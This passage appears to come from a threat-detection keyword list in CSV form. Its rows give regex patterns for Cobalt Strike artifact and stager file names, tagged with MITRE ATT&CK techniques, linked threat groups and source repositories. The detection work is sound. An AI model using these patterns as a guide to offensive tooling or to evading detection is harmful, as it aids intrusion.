Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34083"
"*artifact.x86.dll*",".{0,1000}artifact\.x86\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34084"
"*artifact.x86.exe*",".{0,1000}artifact\.x86\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34085"
"*artifact_payload*",".{0,1000}artifact_payload.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","34086"
"*artifact_stageless*",".{0,1000}artifact_stageless.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","34087"
"*artifact_stager*",".{0,1000}artifact_stager.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","34088"
"*artifact32*.exe*",".{0,1000}artifact32.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34089"
"*artifact32.dll*",".{0,1000}artifact32\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34090"
"*artifact32.exe*",".{0,1000}artifact32\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34091"
"*artifact32big.dll*",".{0,1000}artifact32big\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34092"
"*artifact32big.exe*",".{0,1000}artifact32big\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34093"
"*artifact32svc.exe*",".{0,1000}artifact32svc\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34094"
"*artifact32svcbig.exe*",".{0,1000}artifact32svcbig\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34095"
"*artifact64*.exe*",".{0,1000}artifact64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34096"
"*artifact64.dll*",".{0,1000}artifact64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34097"
"*artifact64.exe*",".{0,1000}artifact64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34098"
